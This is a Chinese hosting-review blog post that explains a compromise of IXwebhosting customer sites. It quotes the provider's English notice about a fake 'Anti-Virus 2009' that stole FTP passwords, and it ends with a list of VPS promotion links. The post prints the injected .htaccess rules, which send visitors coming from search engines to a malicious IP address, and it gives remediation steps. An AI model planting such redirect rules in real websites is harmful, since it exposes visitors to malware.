关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- ioncloud→8 折优惠 圣何塞 cn2 云服务器 带 WindowWINDOWS
- Fallout Hosting→达拉斯 VPS 1 核 1G 内存 20全球[VPS测评]
- 宝塔面板回收站位置 宝塔面板回收站在哪里全球[VPS测评]
- 163 线路-ShockHosting→3.74 美元 KVM 1G 1全球[VPS测评]
- 促销 标准互联→圣何塞 CN2 GIA 年付 300 元 洛杉矶 CN2全球[VPS测评]
- Hostshare→日本 香港 美国 XEN-2GB 内存套餐每月 45日本VPS[主机]
- VirMach→$37 月-E3 1240 16GB 1TB 10TB 全球[VPS测评]
- 八月优惠 RAKsmart→美国 CN 直连服务器降至 399 元 月 美国VPS[主机]
- Ubuntu 下安装 LXDE+XRDP 实现远程桌面访问用来刷 PT全球[VPS测评]
- 稳定 RAKsmart→圣何塞 100M 不限流量服务器 61.38 美全球[VPS测评]
- 日本VPS服务器商家收集汇总 方便购买日本VPS服务器日本VPS[主机]
- WebPlot法国OVH机房 ,500G DDoS防御,不限流量,首月1全球[VPS测评]
- Terrahost挪威AMD不限流量VPS六五折优惠,Ryzen 595全球[VPS测评]
- WordPress禁用谷歌字体插件:Disable Google Fon全球[VPS测评]
- 大前端 DUX 增强版 WordPress 主题:DUX-Plus 支持全球[VPS测评]
- hostEONS 1核心 256M内存 5G SSD 100M不限流量 全球[VPS测评]
- 阿里行癫:如何理解当下的云计算全球[VPS测评]
- 中概股扫描网传拼多多正筹备跨境电商平台首站登陆美国美国VPS[主机]
- 很简单的图片不规则布局样式,纯css样式实现的图片瀑布流布局全球[VPS测评]
- 为什么阿里云、腾讯云卖服务器可以挣到钱?全球[VPS测评]
- edgenat:韩国cn2+香港cn2,VPS八折优惠,8核8G/50gWINDOWS
- 硅云:香港云服务器2核2G5M促销1999元/3年起,香港虚拟主机1G空虚拟空间(主机)
- 虾皮跨境电商怎么样?虾皮跨境电商靠谱吗?全球[VPS测评]
- 港口雄开万里流丨不出国门海淘全球青岛跨境电商未来可期全球[VPS测评]
- 虾皮跨境电商怎么样?虾皮跨境电商靠谱吗?全球[VPS测评]
- 谷歌浏览器网址如何显示http,www,Chrome谷歌浏览器恢复地址栏全球[VPS测评]
- 二三互联年末回馈:香港/美国云服务器新购特价促销,优惠码可打76折美国VPS[主机]
- 景文互联年终活动:云服务器7折,多送2G内存,香港cn2\\日本cn2\日本VPS[主机]
- 后浪云:优惠码”2021″,美国/香港2核4G2M云服务器仅32.5元/美国VPS[主机]
- 六一云:香港CMI VPS,10G防御,1核/1G/40G SSD/15香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-117144.html











